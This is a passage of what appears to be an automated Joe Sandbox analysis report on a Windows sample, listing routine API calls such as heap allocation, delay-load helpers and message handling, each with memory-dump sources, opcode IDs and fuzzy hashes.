                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                    • Instruction ID: 116cc2ffdd90f0763ec7425c307681818620437157e847fd0974edf9b8956a9f
                                    • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                    • Instruction Fuzzy Hash: 19F08C31990B059FDB32DA68C941616B7E8EB15320F20891AE496CF690E770F880C742
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00345BDC
                                      • Part of subcall function 0034B07D: __EH_prolog.LIBCMT ref: 0034B082
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: dfb2c23e8564f8f8bfd0de8a3d5012de63004f9daa49a434478e3fc919d6e261
                                    • Instruction ID: 74c223c8d6b6270f5b597025ecdaa05c60f3c18eea1b0447f2a7ada6a46cbc2d
                                    • Opcode Fuzzy Hash: dfb2c23e8564f8f8bfd0de8a3d5012de63004f9daa49a434478e3fc919d6e261
                                    • Instruction Fuzzy Hash: 5F01AD30A04684DEC726F7A8C0053EDF7E49F19301F44809EA85A1B283CBB42B08C6A2
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 75fb704346b704f468f3416c766a53f1dbbec5a3f7daaf5f27b4c3c3fa8232ec
                                    • Instruction ID: ffa5960490cc44ff383a8a7bff1b59315e179e53272a005da6908615259ae33a
                                    • Opcode Fuzzy Hash: 75fb704346b704f468f3416c766a53f1dbbec5a3f7daaf5f27b4c3c3fa8232ec
                                    • Instruction Fuzzy Hash: 64E0E5215412215AEB332B699C00B9A378C9F4B3F0F16C310EF1AA609DCF20CC0145E6
                                    APIs
                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0034A4F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CloseFind
                                    • String ID:
                                    • API String ID: 1863332320-0
                                    • Opcode ID: 10a60d998a446426604eed270c7bb187be4b7ce29b50eeec9d844c2abc9fdac6
                                    • Instruction ID: 32b370d915267ca7969288f583ae2759e57a7d3e4b2cd5f4e1e7040b68dc7f9f
                                    • Opcode Fuzzy Hash: 10a60d998a446426604eed270c7bb187be4b7ce29b50eeec9d844c2abc9fdac6
                                    • Instruction Fuzzy Hash: 27F0E931048B80AACA335B7848047CBBBD56F06331F04CA49F1FD0E292C27474C59723
                                    APIs
                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 003506B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ExecutionStateThread
                                    • String ID:
                                    • API String ID: 2211380416-0
                                    • Opcode ID: a5ea55477b9933395d9a3b3a1bf9e5b207c000d03779b46ca96a498bbb883de7
                                    • Instruction ID: c9d849ff2f6ebbbf18234990183f6eeadc38a611d3c6a7be2dad628883c498c4
                                    • Opcode Fuzzy Hash: a5ea55477b9933395d9a3b3a1bf9e5b207c000d03779b46ca96a498bbb883de7
                                    • Instruction Fuzzy Hash: C3D02B3830011065C62B3765A80BFFE1A8A4FC3712F0A00A1BD0D1F1A78B4708CE53E3
                                    APIs
                                    • GdipAlloc.GDIPLUS(00000010), ref: 00359D81
                                      • Part of subcall function 00359B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00359B30
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                    • String ID:
                                    • API String ID: 1915507550-0
                                    • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                    • Instruction ID: 48950dd3c6dbf229c94823ffffe00604f5f3642276ef96539519c7bb0d742161
                                    • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                    • Instruction Fuzzy Hash: 8AD0C73065820DFADF46BA759C02F7A7BFDDB00351F104567BC088A161ED71DF14A661
                                    APIs
                                    • GetFileType.KERNELBASE(000000FF,00349887), ref: 00349995
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileType
                                    • String ID:
                                    • API String ID: 3081899298-0
                                    • Opcode ID: 7c2a699d3aa0564207a339baa182c7e9eee3c87dde15f25deb9a09c9f3b70e40
                                    • Instruction ID: dbaf1a260c34fb7ad96ab5881f40514a3bce9c7158d4a6a579bae56981c058c0
                                    • Opcode Fuzzy Hash: 7c2a699d3aa0564207a339baa182c7e9eee3c87dde15f25deb9a09c9f3b70e40
                                    • Instruction Fuzzy Hash: 02D01231011180958F3746344D0929B7795DB83366B39C6ADD065C80A1D733D843F542
                                    APIs
                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0035D43F
                                      • Part of subcall function 0035AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035AC85
                                      • Part of subcall function 0035AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035AC96
                                      • Part of subcall function 0035AC74: IsDialogMessageW.USER32(00010420,?), ref: 0035ACAA
                                      • Part of subcall function 0035AC74: TranslateMessage.USER32(?), ref: 0035ACB8
                                      • Part of subcall function 0035AC74: DispatchMessageW.USER32(?), ref: 0035ACC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                    • String ID:
                                    • API String ID: 897784432-0
                                    • Opcode ID: b88669b4a24f99bd848926ed7d1d0a042bfd28aaebd5c962949475169cbef8a8
                                    • Instruction ID: ddcf35b4a51c2df648ccb6e2cdfdb70be0de14e1c3b0f61d4d4a461a3f3ce9a2
                                    • Opcode Fuzzy Hash: b88669b4a24f99bd848926ed7d1d0a042bfd28aaebd5c962949475169cbef8a8
                                    • Instruction Fuzzy Hash: 17D09E72144300ABDA132B51CE06F0F7AE6AB88B05F404694B744790B18A62AD20AB16
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035E20B
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 5cb2d71ea42b0a6c5445985c78c5ded1e2eeb3e4a4385ad659b5ac2b0c0b128a
                                    • Instruction ID: 31174bb34d3ee759535bf1c2dbfe7ff74b4cf9c93139a338e7391360849fc854
                                    • Opcode Fuzzy Hash: 5cb2d71ea42b0a6c5445985c78c5ded1e2eeb3e4a4385ad659b5ac2b0c0b128a
                                    • Instruction Fuzzy Hash: 00B0129526E001FD721FA204BD06D77032CC4C0B53330C41AFD09D849095404D0D4432
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: d6d3736890279e9409bb70df9771dd1892aff9edc2d66df02d4f05074351ad76
                                    • Instruction ID: dbf5f32e8bfc15c9728cd2a18f7507689bb0f3501c9e880427e21bb5ad972a66
                                    • Opcode Fuzzy Hash: d6d3736890279e9409bb70df9771dd1892aff9edc2d66df02d4f05074351ad76
                                    • Instruction Fuzzy Hash: D5B012D526C001AD313BF219AC06F3F035CC0C4B12330C51BFC0DC4458D4444C0D4831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: c7bb7a6067fc3c09d5ae712dad14b5ba798dd954072e3dd542be810184f2bec7
                                    • Instruction ID: 39c6efa5b1828c982713c527aa97556ff7654a9b7af161a61a9a298ed16b20d8
                                    • Opcode Fuzzy Hash: c7bb7a6067fc3c09d5ae712dad14b5ba798dd954072e3dd542be810184f2bec7
                                    • Instruction Fuzzy Hash: D3B012A526C001ED313BF219AC06E3B025CC0C0B12330C11BFC0DC4068D4484C0C4831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: df713ea34e158e556e245eba26aba4b656f5864d06518b940d1548d54b9e5f64
                                    • Instruction ID: 442cf725f8b34852d8a0f33dec130aff59cdfa2293572821bb78efc0784523e2
                                    • Opcode Fuzzy Hash: df713ea34e158e556e245eba26aba4b656f5864d06518b940d1548d54b9e5f64
                                    • Instruction Fuzzy Hash: 02B012952AC101AD713BF219AC06F3B025CD0C0B12330811BFC0DC4458D4884C0C4931
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 791e209669c33e994573afb1a66edc39ceee931d6332a692e38e35d90b37490b
                                    • Instruction ID: 66e43dccc59aa57981d16f0537968c3a4c8fa2e6e1c73dcdbf50c720ede3a659
                                    • Opcode Fuzzy Hash: 791e209669c33e994573afb1a66edc39ceee931d6332a692e38e35d90b37490b
                                    • Instruction Fuzzy Hash: D2B0129936C003AD312F92187D07E77022CC0C0B12330C01AFD0DC4660D9404C0D8531
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 4cab0bffcd8763ec1ee04cbf31dd9a9090ed5157682a6cce092765c619fb3835
                                    • Instruction ID: 7477299aef7e1038a0f0808c0383e00f87150669a425520f0168dbee81f5d37a
                                    • Opcode Fuzzy Hash: 4cab0bffcd8763ec1ee04cbf31dd9a9090ed5157682a6cce092765c619fb3835
                                    • Instruction Fuzzy Hash: 9AB0129A36C003ED312F92087C07E77023CC0C0B12331C01AFC0DC5660D9404C0C8531
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 084755e297e59690cde243513d4724c610603737a462b213b23e6f00bda91207
                                    • Instruction ID: 2a3326be83322b4472e963324d65a56e4120a721112644eeb067a5dd0c6c1f46
                                    • Opcode Fuzzy Hash: 084755e297e59690cde243513d4724c610603737a462b213b23e6f00bda91207
                                    • Instruction Fuzzy Hash: 17B0129936C002AD312B91597C07F77022DD0C0B12330802AF80EC4E60D9404C0C8531
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 39c7aebc3b38e15f816bbbb54f6d9da6e9522829b2d279ea6ae2eb37640cd0d1
                                    • Instruction ID: ce68056b5e34408a4a90468a03aec2aa2ff8f75564b01cfd96fe3323b8c532b0
                                    • Opcode Fuzzy Hash: 39c7aebc3b38e15f816bbbb54f6d9da6e9522829b2d279ea6ae2eb37640cd0d1
                                    • Instruction Fuzzy Hash: 09B0129937C107BD322B52047C07D77022CC0C0B12330812AFC09D456099404C4C8431
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 72d72cba2b937777bb34561c8692252fbf5cff5388666f1676fa97fda06fcf4c
                                    • Instruction ID: 4191e25ede10cf8c6877219d115746d14a8da07c0f59be13f5ecb20123cc3b32
                                    • Opcode Fuzzy Hash: 72d72cba2b937777bb34561c8692252fbf5cff5388666f1676fa97fda06fcf4c
                                    • Instruction Fuzzy Hash: 95B0129926C201BD312F2104BE02E77423CC1C2B12330861AF909E4470D5805C4C5831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
